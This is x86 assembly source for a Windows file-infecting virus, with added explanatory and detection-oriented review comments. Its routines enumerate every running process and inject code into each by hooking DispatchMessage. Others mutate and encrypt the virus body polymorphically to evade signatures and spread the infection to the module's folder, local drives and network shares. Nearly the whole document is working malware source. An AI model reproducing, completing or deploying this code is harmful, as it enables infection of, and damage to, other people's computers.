
lea esi,[ebp+inject_code-inf_proc_ip]
push esi
call blk_decrypt

pushad

mov ecx,[ebp+addrMapViewOfFile-inf_proc_ip]
mov [ebp+inject_code_mapviewoffile-inf_proc_ip],ecx
mov ecx,[ebp+addrOpenFileMappingA-inf_proc_ip]
mov [ebp+inject_code_openfilemapping-inf_proc_ip],ecx

call inf_proc_0
db FMAP_NAME
inf_proc_0:
pop edi
push edi
push large 0
push large FILE_MAP_WRITE
call ecx
or eax,eax
jz short inf_proc_not_mapped
push eax
call [ebp+addrCloseHandle-inf_proc_ip]
jmp short inf_proc_mapped

inf_proc_not_mapped:
mov eax,vir_mem_size
mov ecx,eax
SUBCALL create_mem_map,inf_proc_ip
jz short inf_proc_mapped
cld
mov edi,eax
xor eax,eax
stosd
mov eax,vir_size
stosd
lea esi,[ebp+_start-inf_proc_ip]
rep movsb

mov [ebp+quick_sleep-inf_proc_ip],esi ;Have quick sleep

inf_proc_mapped:
popad

mov [ebp+inf_proc_esp-inf_proc_ip],esp
SUBCALL virtual_protect,inf_proc_ip
jz inf_proc_ret

;edi ;Process handle
;ebx Process base address
;eax vbuffer address

push edi
push ebx

SUBCALL read_proc_mem,inf_proc_ip

cmp byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN ;Has been infected?
inf_proc_seh_restore_jmp:
jz inf_proc_seh_restore
mov byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN

mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table

mov ebx,eax
SUBCALL check_pe,inf_proc_ip
jz short inf_proc_seh_restore_jmp
;eax->PE base
mov edi,[eax+28h]
SUBCALL get_section_of_rva,inf_proc_ip
or ecx,ecx
jz short inf_proc_seh_restore_jmp

mov edi,[edx+4]
mov [ebp+inf_proc_rva-inf_proc_ip],edi
mov edi,[edx]
mov ecx,[edx+8]
cmp edi,ecx
jna short inf_proc_3
xchg ecx,edi
inf_proc_3:
;Now edi is the small size,ecx is the big one
mov [ebp+inf_proc_code_size-inf_proc_ip],edi
sub ecx,edx
cmp ecx,inject_code_size
jc inf_proc_seh_restore

mov ecx,[eax+80h] ;Import directory
or ecx,ecx
jz short inf_proc_seh_restore_jmp
pop ebx
pop edi
push ebx
add ebx,ecx

push ecx
SUBCALL read_proc_mem,inf_proc_ip

push edx
SUBCALL get_rand,inf_proc_ip
movzx ecx,dl
and cl,3fh
pop edx
pop esi

mov ebx,eax
sub ebx,5*4
push ecx
inf_proc_101:
add ebx,5*4
mov ecx,[ebx+3*4]
jecxz inf_proc_102
push eax
sub ecx,esi
cmp ecx,INFPROC_MAP_SIZE
jnc short inf_proc_102
mov eax,[eax+ecx]
call eax_to_lowcase
cmp eax,'resu' ;user
pop eax
jnz short inf_proc_101
mov dword ptr [esp],1000h
mov eax,ebx
inf_proc_102:
pop ecx

mov ebx,[eax+4*4]
add ebx,[esp]
push ebx
SUBCALL virtual_protect,inf_proc_ip
jz inf_proc_seh_restore
SUBCALL read_proc_mem,inf_proc_ip ;read import table
mov esi,eax

cld
inf_proc_1:
lodsd
cmp eax,[ebp+addrDispatchMessageA-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
cmp eax,[ebp+addrDispatchMessageW-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
or eax,eax
loopnz inf_proc_1
inf_proc_1_5:

sub esi,4
or eax,eax
jnz short inf_proc_2
sub esi,4
inf_proc_2:
mov eax,[esi]
mov [ebp+inject_code_raw_api-inf_proc_ip],eax

mov ebx,[esp+4]
add ebx,12345678h
inf_proc_rva equ $-4
add ebx,12345678h
inf_proc_code_size equ $-4
mov [esi],ebx
SUBCALL virtual_protect,inf_proc_ip
jz short inf_proc_seh_restore
lea eax,[ebp+inject_code-inf_proc_ip]
push large inject_code_size
pop ecx
SUBCALL write_proc_mem,inf_proc_ip ;Write inject code
jz short inf_proc_seh_restore

pop ebx
lea eax,[ebp+vbuffer-inf_proc_ip]
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table

inf_proc_ret:
inf_proc_seh_restore:
mov esp,12345678h
inf_proc_esp equ $-4

SUBCALL get_rand,inf_proc_ip
pop esi
mov [esi-4],dx
call blk_encrypt

POP    DWord Ptr FS:[0]  ; restore except chain
pop esi
pop esi

popad
retn

inf_proc_seh:
; inf_proc_seh -- structured exception handler installed by inf_proc (the frame setup
; is above this view; the matching "POP DWord Ptr FS:[0]" is at inf_proc_seh_restore's
; exit path). Handler frame on entry: [esp]=ret, [esp+4]=EXCEPTION_RECORD*,
; [esp+8]=registration frame, [esp+0Ch]=CONTEXT*.
; Instead of unwinding, it redirects the faulting thread to inf_proc_seh_restore, which
; reloads esp from the runtime-patched inf_proc_esp slot and runs the normal cleanup.
; Clobbers: eax, flags.
call inf_proc_seh_ip
inf_proc_seh_ip:
pop eax                             ; eax = runtime address of inf_proc_seh_ip (call/pop delta trick)
lea eax,[eax-(inf_proc_seh_ip-inf_proc_seh_restore)] ; eax = &inf_proc_seh_restore
PUSH  eax
MOV   EAX,[ESP + 00Ch+4]          ; context (+4 because of the push above)
POP   DWord Ptr [EAX + 0B8h]     ; context.eip = @ExceptProc (CONTEXT.Eip is at +0B8h)
XOR   EAX,EAX                    ; 0 = ExceptionContinueExecution
RET

inf_proc_end:


CALLHEADER enum_proc
enum_proc:
; enum_proc -- visit every process on the machine and hand each PID to into_proc.
; In:  ebp-relative data; addrCreateToolhelp32Snapshot may be 0 if it was not resolved.
; Out: none; all GPRs restored by pushad/popad.
; Two strategies:
;   1. Toolhelp resolved -> snap_proc walks a real process snapshot.
;   2. Toolhelp missing  -> brute force: PIDs 4, 8, ... 80000 in steps of 4.
; Detection note: the fallback path issues ~20000 OpenProcess calls in a tight loop
; (see into_proc); the snapshot path shows the classic Snapshot/First/Next/OpenProcess sequence.
pushad

call enum_proc_ip
enum_proc_ip:
pop ebp                                  ; ebp = delta base for every [ebp+sym-enum_proc_ip] reference
mov ecx,[ebp+addrCreateToolhelp32Snapshot-enum_proc_ip]
jecxz short enum_proc_0                  ; API pointer is 0 -> brute-force path
SUBCALL snap_proc,enum_proc_ip
jmp short enum_proc_ret

enum_proc_0:
xor eax,eax                              ; eax = candidate PID
mov ecx,20000                            ; 20000 iterations x 4 = PIDs up to 80000
enum_proc_1:
add eax,4                                ; NT process IDs are multiples of 4
SUBCALL into_proc,snap_proc_ip           ; snap_proc_ip equ enum_proc_ip: same delta base; into_proc preserves ecx (pushad/popad)
loop enum_proc_1

enum_proc_ret:
popad
retn
enum_proc_end:


;in--ebp->enum_proc_ip
CALLHEADER snap_proc
snap_proc:
snap_proc_ip equ enum_proc_ip            ; reuses enum_proc's delta: caller must already have ebp set
; snap_proc -- Toolhelp process walk: CreateToolhelp32Snapshot / Process32First / Process32Next,
; calling into_proc for each (on Win9x: only for processes whose name contains '\explorer').
; In:  ebp = enum_proc_ip delta base.
; Out: none; all GPRs restored by pushad/popad.
; Stack discipline: the snapshot handle stays pushed for the whole loop (peeked with
; pop/push at snap_proc_5) and is finally consumed as CloseHandle's argument.
; Offsets used below are PROCESSENTRY32 (ANSI): dwSize +0, th32ProcessID +8, szExeFile +36.
pushad
push large 0                             ; th32ProcessID = 0 (ignored for TH32CS_SNAPPROCESS)
push large 2 ;TH32CS_SNAPPROCESS
call [ebp+addrCreateToolhelp32Snapshot-snap_proc_ip]
or eax,eax
jz snap_proc_ret                         ; snapshot failed: nothing pushed yet, plain return
push eax                                 ; [esp] = snapshot handle, kept until CloseHandle

lea edi,[ebp+snapbuf-snap_proc_ip]       ; edi -> PROCESSENTRY32 buffer (snapbuf defined elsewhere)
mov dword ptr [edi],296 ;size            ; pe.dwSize = sizeof(PROCESSENTRY32) = 296
push edi
push eax
call [ebp+addrProcess32First-snap_proc_ip]

snap_proc_1:
or eax,eax                               ; BOOL result of Process32First/Next
jz snap_proc_2                           ; end of list
mov ecx,[ebp+is9x-snap_proc_ip]          ; is9x = GetVersion MSB, set in main_thread
jecxz snap_proc_3                        ; NT family: every process is a candidate
push edi                                 ; save buffer pointer; edi is reused for the needle below
lea ebx,[edi+9*4] ;->szExeFile
call snap_proc_4                         ; call/pop trick: edi = address of the inline string
db '\explorer',0
snap_proc_4:
pop edi

SUBCALL str_instr,snap_proc_ip           ; substring search (str_instr not shown; presumably ebx=haystack, edi=needle)
pop edi                                  ; restore PROCESSENTRY32 pointer
jnz short snap_proc_5 ;If is Win9X,only explorer to infect  (ZF-clear = no match, inferred from this use)
snap_proc_3:
mov eax,[edi+2*4] ;th32ProcessID
SUBCALL into_proc,snap_proc_ip           ; into_proc(eax = PID)
snap_proc_5:
pop eax                                  ; peek the snapshot handle without dropping it
push eax

push edi
push eax
call [ebp+addrProcess32Next-snap_proc_ip] ; stdcall: callee removes both args, handle stays at [esp]
jmp snap_proc_1

snap_proc_2:
call [ebp+addrCloseHandle-snap_proc_ip]  ; argument = the snapshot handle still at [esp]
snap_proc_ret:
popad
retn
snap_proc_end:


;in--ebp->enum_proc_ip,eax=PID
CALLHEADER into_proc
into_proc:
into_proc_ip equ enum_proc_ip            ; shares enum_proc's delta base
; into_proc -- open one process by PID and run inf_proc against it.
; In:  eax = PID, ebp = enum_proc_ip delta base.
; Out: none (pushad/popad); the process handle is always closed before returning.
; Detection note: OpenProcess(0FFFh = every process-specific right, incl. VM read/write/operation)
; against every PID, followed by the remote memory writes inside inf_proc, is the observable pattern.
pushad

push eax                                 ; dwProcessId = PID
push large 0                             ; bInheritHandle = FALSE
push large 0fffh                         ; dwDesiredAccess = all process-specific access bits
call [ebp+addrOpenProcess-into_proc_ip]
or eax,eax
jz short into_proc_2                     ; open failed (access denied / no such PID): skip silently
push eax                                 ; keep handle on the stack as CloseHandle's argument
xchg eax,edi                             ; edi = process handle (inf_proc input, see its ";edi Process handle" note)
mov ebx,400000h                          ; ebx = assumed image base of the target; hard-coded, never queried
SUBCALL inf_proc,into_proc_ip
call [ebp+addrCloseHandle-enum_proc_ip]  ; same delta as into_proc_ip; consumes the pushed handle
into_proc_2:
popad
retn
into_proc_end:


;in--ebx->image base
;out--ZF clear: valid PE; ZF set: invalid; eax->PE base
CALLHEADER check_pe
check_pe:
; check_pe -- decide whether the image at ebx is a PE of the kind this code targets.
; In:  ebx -> image base (IMAGE_DOS_HEADER).
; Out: ZF clear = accepted, ZF set = rejected; eax -> PE signature (ebx + e_lfanew),
;      meaningful only once the "ZM" test has passed.
; Accepts only: "MZ" + "PE" signatures, IMAGE_FILE_DLL clear, Subsystem 2 or 3 (Windows GUI / console).
; Clobbers: eax, flags. ecx and ebx are preserved.
; NOTE(review): e_lfanew is not bounds-checked; a bad value faults and presumably lands in
; the caller's SEH handler (inf_proc_seh) -- verify.
push ecx
xor ecx,ecx                              ; ecx = 0 -> "rejected" until every test passes
cmp word ptr [ebx],'ZM'                  ; IMAGE_DOS_HEADER.e_magic == "MZ"
jnz short check_pe_ret
mov eax,[ebx+3ch]                        ; e_lfanew
add eax,ebx                              ; eax -> "PE\0\0"
cmp word ptr [eax],'EP'
jnz short check_pe_ret
test byte ptr [eax+16h+1],20h ;Is a DLL?  FileHeader.Characteristics (+16h), bit 2000h = IMAGE_FILE_DLL
jnz short check_pe_ret
push ebx
mov bl,[eax+5ch] ;Subsystem              ; OptionalHeader.Subsystem (+18h+44h)
and bl,0feh                              ; clear bit0 so both 2 (GUI) and 3 (CUI) compare as 2
cmp bl,2
pop ebx
jnz short check_pe_ret
inc ecx                                  ; ecx = 1 -> accepted
check_pe_ret:
or ecx,ecx                               ; ZF := (ecx == 0)
pop ecx                                  ; pop does not alter flags, so ZF reaches the caller
retn
check_pe_end:


;Get the section of a RVA
;in--eax=PE base,edi=RVA to find
;out--edx->section header.VirtualSize,ecx=0 means not found
;if not found,edx=>last section header.VirtualSize
CALLHEADER get_section_of_rva
get_section_of_rva:
; get_section_of_rva -- find the section header whose virtual range contains an RVA.
; In:  eax -> PE signature (as returned by check_pe), edi = RVA to locate.
; Out: ZF clear -> found, edx -> that header's VirtualSize field, i.e.
;        [edx] = VirtualSize, [edx+4] = VirtualAddress, [edx+8] = SizeOfRawData;
;      ZF set   -> not found, edx -> VirtualSize field of the last header
;        (with NumberOfSections = 0 it points 28h bytes before the first header).
; Clobbers: edx, esi, flags. ecx is preserved.
; NOTE(review): because ecx is pushed/popped, the caller gets its own ecx back; only ZF
; carries the result here. The header comment's "ecx=0 means not found" (and inf_proc's
; "or ecx,ecx" after the call) do not match this code unless SUBCALL (not shown) intervenes.
push ecx
movzx edx,word ptr [eax+14h]             ; FileHeader.SizeOfOptionalHeader
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
                                         ; +18h = optional header, +SizeOfOptionalHeader = first section header,
                                         ; +8 = its VirtualSize field, -28h = one header earlier (loop pre-increments)
movzx ecx,word ptr [eax+6]               ; FileHeader.NumberOfSections
inc ecx                                  ; dec/jecxz below then iterates exactly NumberOfSections times
get_section_of_rva_1:
dec ecx
jecxz get_section_of_rva_2               ; all headers examined -> ecx = 0 -> not found
add edx,28h ;->VirtualSize               ; sizeof(IMAGE_SECTION_HEADER) = 28h
mov esi,[edx+4]; esi=VirtualAddress
cmp edi,esi ;RVA<VirtualAddress?         ; below this section -> next
jc short get_section_of_rva_1
add esi,[edx]; esi=VirtualAddress+VirtualSize
cmp esi,edi; VirtualAddress+VirtualSize<=RVA -> past this section, next
jna short get_section_of_rva_1           ; found when VirtualAddress <= RVA < VirtualAddress+VirtualSize
get_section_of_rva_2:
or ecx,ecx                               ; ZF := (ecx == 0)
pop ecx                                  ; flags survive the pop
retn
get_section_of_rva_end:


;Copy and encrypt vir body to infbuffer
CALLHEADER prepare_buffer
prepare_buffer:
; prepare_buffer -- build the copy of the code body that inf_proc later writes elsewhere.
; Steps: (1) run the poly_* mutators so each generation's bytes differ,
;        (2) copy vir_size bytes from _start to infbuffer,
;        (3) pick a random 16-bit key per block and encrypt the prepare_buffer and
;            main_thread blocks inside the copy with blk_encrypt.
; In:  none; every address is ebp-relative via the pre_buf_ip delta.
; Out: infbuffer filled; no registers changed (pushad/popad).
; NOTE(review): the key is written as a word at [block-4]; that slot is presumably
;   reserved by the CALLHEADER macro in front of each routine (macro not shown) -- verify.
; NOTE(review): poly_blk_encrypt documents "in--edx=random" but nothing here calls
;   get_rand before it; poly_start/poly_callsub restore edx via popad, so it receives
;   whatever edx the caller of prepare_buffer had (unless SUBCALL sets it).
pushad
call pre_buf_ip
pre_buf_ip:
pop ebp                                  ; ebp = delta base

SUBCALL poly_start,pre_buf_ip            ; mutate the _start stub
SUBCALL poly_callsub,pre_buf_ip          ; mutate the _callsub stub
SUBCALL poly_blk_encrypt,pre_buf_ip      ; mutate blk_encrypt's first bytes
SUBCALL poly_blk_encrypt_poly,pre_buf_ip ; mutate poly_blk_encrypt itself

lea esi,[ebp+_start-pre_buf_ip]          ; src = live code body
lea edi,[ebp+infbuffer-pre_buf_ip]       ; dst = staging buffer
mov ecx,vir_size
cld
push edi                                 ; remember the start of the copy
rep movsb

SUBCALL get_rand,pre_buf_ip              ; random in edx (return register inferred from the uses below)
pop edi                                  ; edi -> copy of _start
lea esi,[edi+prepare_buffer-_start]      ; esi -> prepare_buffer inside the copy
mov word ptr [esi-4],dx                  ; key word stored just before the block
call blk_encrypt                         ; blk_encrypt not shown; assumes esi -> block to encrypt

xchg dh,dl                               ; second key derived from the same random value
lea esi,[edi+main_thread-_start]         ; esi -> main_thread inside the copy
mov word ptr [esi-4],dx
call blk_encrypt

popad
retn
prepare_buffer_end:


CALLHEADER poly_callsub
poly_callsub:
; poly_callsub -- rewrite the 16-byte stub at _callsub (defined elsewhere) in one of four
; byte layouts selected by two random bits; every layout executes the same four instructions.
; In:  none. Out: none (pushad/popad).
; Byte decode of the constants below (little-endian; verify against an assembler listing):
;   E8 rel32            call blk_encrypt        FF 76 FC  push dword ptr [esi-4]
;   66 C7 46 FC 00 00   mov word ptr [esi-4],0  56        push esi
; dl bit0 swaps the order of the call and the push [esi-4]; dl bit1 swaps the order of the
; mov word and the push esi. When the push precedes the call, the displacement is reduced
; by 3 (the call's origin moves 3 bytes later). call_sub_1 is presumably the address right
; after the first-layout call (its rel32 origin). The first layout writes the top byte of
; rel32 as 00, so it assumes a forward displacement that fits in 24 bits.
pushad
call poly_callsub_ip
poly_callsub_ip:
pop ebp
SUBCALL get_rand,poly_callsub_ip         ; dl = random bits
lea edi,[ebp+_callsub-poly_callsub_ip]   ; edi -> stub to patch
mov dword ptr [edi],000000e8h+(blk_encrypt-call_sub_1)*100h   ; E8 + low 3 bytes of rel32
mov dword ptr [edi+4],0fc76ff00h         ; 00 (rel32 top byte), FF 76 FC
test dl,1
jz short poly_callsub_1
mov dword ptr [edi],0e8fc76ffh           ; FF 76 FC, then E8
mov dword ptr [edi+4],00000000h+(blk_encrypt-call_sub_1-3)    ; rel32 from the moved origin
poly_callsub_1:

mov dword ptr [edi+8],0fc46c766h         ; 66 C7 46 FC
mov dword ptr [edi+8+4],0ff560000h       ; 00 00 (imm16), 56, FF (FF = first byte of whatever follows)
test dl,2
jz short poly_callsub_2
mov dword ptr [edi+8],046c76656h         ; 56, 66 C7 46
mov dword ptr [edi+8+4],0ff0000fch       ; FC 00 00, FF
poly_callsub_2:

popad
retn
poly_callsub_end:

;in--edx=random
CALLHEADER poly_blk_encrypt
poly_blk_encrypt:
; poly_blk_encrypt -- patch three sites inside blk_encrypt (defined elsewhere) so the
; routine's bytes differ between generations while it keeps behaving the same.
; In:  dl = random bits (bit0, bit1, bit2 used). NOTE(review): this routine never calls
;      get_rand; the value is whatever edx the caller passes in.
; Out: none (pushad/popad). Uses edi as its delta base instead of ebp.
; Patch sites, offsets relative to blk_encrypt:
;   +0,+1            the two leading bytes swapped (bit0) -- assumes both are 1-byte instructions
;   +2               56 5F (push esi / pop edi) or 8B FE (mov edi,esi) (bit1)
;   +blk_encrypt_@1  6A 00 59 (push 0 / pop ecx) or 33 C9 90 (xor ecx,ecx / nop) (bit2);
;                    the 4th byte 0F in both constants is presumably the unchanged next opcode
; The poly_blk_encrypt_@N equates mark this routine's OWN instructions so that
; poly_blk_encrypt_poly can re-randomise which registers they use.
pushad
call poly_blk_encrypt_ip
poly_blk_encrypt_ip:
pop edi
add edi,blk_encrypt-poly_blk_encrypt_ip  ; edi -> blk_encrypt
test dl,1
jz short poly_blk_encrypt_1
poly_blk_encrypt_@1 equ $                ; modrm bytes of the next three instructions sit at +1, +3, +6
mov bl,[edi]                             ; swap bytes [edi] and [edi+1] through bl
xchg bl,[edi+1]
xchg bl,[edi]
poly_blk_encrypt_1:

poly_blk_encrypt_@2 equ $+1              ; -> the BB opcode byte (register in its low 3 bits); the store's modrm is at +5
mov bx,5f56h
mov word ptr [edi+2],bx                  ; bytes 56 5F
test dl,2
jz short poly_blk_encrypt_2
poly_blk_encrypt_@3 equ $+1              ; same layout as @2
mov bx,0fe8bh
mov word ptr [edi+2],bx                  ; bytes 8B FE
poly_blk_encrypt_2:

mov dword ptr [edi+blk_encrypt_@1],0f59006ah   ; bytes 6A 00 59 0F
test dl,4
jz short poly_blk_encrypt_3
mov dword ptr [edi+blk_encrypt_@1],0f90c933h   ; bytes 33 C9 90 0F
poly_blk_encrypt_3:

poly_blk_encrypt_4:
popad
retn
poly_blk_encrypt_end:


;in--edi->offset poly_blk_encrypt
CALLHEADER poly_blk_encrypt_poly
poly_blk_encrypt_poly:
; poly_blk_encrypt_poly -- second-level mutation: decrypt poly_blk_encrypt, randomise the
; registers that its own patch instructions use, then re-encrypt it.
; In:  none. The header comment "edi->offset poly_blk_encrypt" is stale: edi is computed here.
; Out: none (pushad/popad).
; Encoding facts relied on: x86 modrm reg field is bits 3..5 (mask 0C7h keeps the rest);
; "mov r16,imm16" (0B8h+reg) carries the register in the opcode's low 3 bits (mask 0F8h).
; Register numbers are limited to 0..3 (al/cl/dl/bl, ax/cx/dx/bx) by the "and ...,3" steps.
; Assumes poly_blk_encrypt is stored encrypted and that blk_decrypt/blk_encrypt (not shown)
; take esi -> block.
pushad

call poly_blk_encrypt_poly_ip
poly_blk_encrypt_poly_ip:
pop ebp
lea edi,[ebp+poly_blk_encrypt-poly_blk_encrypt_poly_ip]
mov esi,edi
call blk_decrypt                         ; poly_blk_encrypt becomes plaintext for patching
SUBCALL get_rand,poly_blk_encrypt_poly_ip
and dl,3h ;only take four common reg,eax,ebx,ecx,edx
mov al,dl
shl al,3                                 ; al = reg << 3, i.e. in modrm reg-field position
and byte ptr [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],0c7h   ; modrm of "mov bl,[edi]"
or [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],0c7h   ; modrm of "xchg bl,[edi+1]"
or [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],0c7h   ; modrm of "xchg bl,[edi]"
or [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],al               ; all three now name the same 8-bit register

mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@2-poly_blk_encrypt],0f8h     ; "mov bx,5f56h": register in opcode low bits
or [edi+poly_blk_encrypt_@2-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],0c7h   ; modrm of the following "mov [edi+2],bx"
or [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],al

SUBCALL get_rand,poly_blk_encrypt_poly_ip  ; fresh random for the second pair

mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@3-poly_blk_encrypt],0f8h     ; "mov bx,0fe8bh"
or [edi+poly_blk_encrypt_@3-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],0c7h   ; modrm of its "mov [edi+2],bx"
or [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],al

mov esi,edi
call blk_encrypt                         ; restore poly_blk_encrypt to its encrypted form
popad
retn
poly_blk_encrypt_poly_end:

CALLHEADER poly_start
poly_start:
; poly_start -- mutate the entry stub at _start (defined elsewhere) using one get_rand value:
;   dl bit0  : swap the two 4-byte units at _start_@1 / _start_@2 (assumes both are 4-byte instructions)
;   dl & 3   : register (0..3) used by the instruction(s) at _start_@3: modrm at +1, opcode-with-reg byte at +3
;   dh & 18h : register (eax/ecx/edx/ebx) written into the modrm bytes at main_enter+1 and main_enter+4
;   top byte bit0 (after rol edx,8) : opcode 89h (mov r/m32,r32) or 87h (xchg r/m32,r32) at main_enter+3
; In:  none. Out: none (pushad/popad).
; NOTE(review): the original ";esi->main_enter" comment before the opcode write is off:
;   esi = main_enter+1, +3, -1 = main_enter+3. The layout of _start/main_enter is not visible here -- verify.
pushad
call poly_start_ip
poly_start_ip:
pop ebp

SUBCALL get_rand,poly_start_ip           ; edx = random
test dl,1
jz short poly_start_1
mov eax,[ebp+_start_@1-poly_start_ip]    ; dword swap of @1 and @2 through eax
xchg eax,[ebp+_start_@2-poly_start_ip]
xchg eax,[ebp+_start_@1-poly_start_ip]
poly_start_1:

lea esi,[ebp+_start_@3+1-poly_start_ip]  ; esi -> byte after the _start_@3 opcode
and dl,3                                 ; register number 0..3
and byte ptr [esi+2],0f8h                ; opcode-with-register byte (_start_@3+3)
or [esi+2],dl
shl dl,3
and byte ptr [esi],0c7h                  ; modrm reg field (_start_@3+1)
or [esi],dl

and dh,018h                              ; dh = (0..3) << 3, already in reg-field position
add esi,main_enter-_start_@3 ;esi->main_enter+1
and byte ptr [esi],0c7h                  ; modrm of the instruction at main_enter
or [esi],dh
add esi,3
and byte ptr [esi],0c7h                  ; modrm at main_enter+4
or [esi],dh
rol edx,8                                ; bring the random's top byte into dl
dec esi ;esi->main_enter+3 (see NOTE(review) above)
mov byte ptr [esi],89h                   ; mov r/m32,r32
test dl,1
jz short poly_start_2
mov byte ptr [esi],87h                   ; alternative opcode: xchg r/m32,r32
poly_start_2:
popad
retn
poly_start_end:
;*******************************infproc.asm end*****************************

;*******************************mainthrd.asm*****************************
;include mainthrd.asm
CALLHEADER main_thread
main_thread:

call main_thread_ip
main_thread_ip:
pop ebp

if DEBUG
OUTSTRING 'I go in'
endif

SUBCALL get_extra_proc,main_thread_ip
SUBCALL prepare_buffer,main_thread_ip

call [ebp+addrGetVersion-main_thread_ip]
shr eax,31 ;MSB=1 means is Win9X
mov [ebp+is9x-main_thread_ip],eax

sub esp,MAX_DIR_SIZE
cld

xor eax,eax
mov [ebp+goto_enum_proc_pretime-main_thread_ip],eax
mov [ebp+quick_sleep-main_thread_ip],eax

call [ebp+addrGetTickCount-main_thread_ip]
mov [ebp+have_a_sleep_pretime-main_thread_ip],eax

call goto_enum_proc

;Infect module path
mov edi,esp
push large MAX_DIR_SIZE
push edi
push large 0
call [ebp+addrGetModuleFileNameA-main_thread_ip]
call find_str_tail
std
mov cl,0ffh
mov al,'\'
repnz scasb
cld
mov byte ptr [edi+1],0
call enum_path

;Infect all driver
infect_all_driver:
SUBCALL get_rand,main_thread_ip
and dl,3
add dl,'c' ;first try C:~F:
mov [esp],dl
mov word ptr [esp+1],':'

push large ((INFECT_LASTDISK-INFECT_FIRSTDISK) and 0ffh)+1
pop ecx

infect_disk_loop:
mov edi,ecx
push esp
call [ebp+addrGetDriveTypeA-main_thread_ip]
cmp al,3
jc short next_disk
cmp al,4
ja short next_disk
call enum_path
next_disk:
mov al,[esp]
inc al
cmp al,INFECT_LASTDISK and 0ffh
jbe short next_disk_1
mov al,INFECT_FIRSTDISK and 0ffh
next_disk_1:
mov [esp],al
mov ecx,edi
loop infect_disk_loop

;Infect through net
infect_net:
xor eax,eax
call enum_net
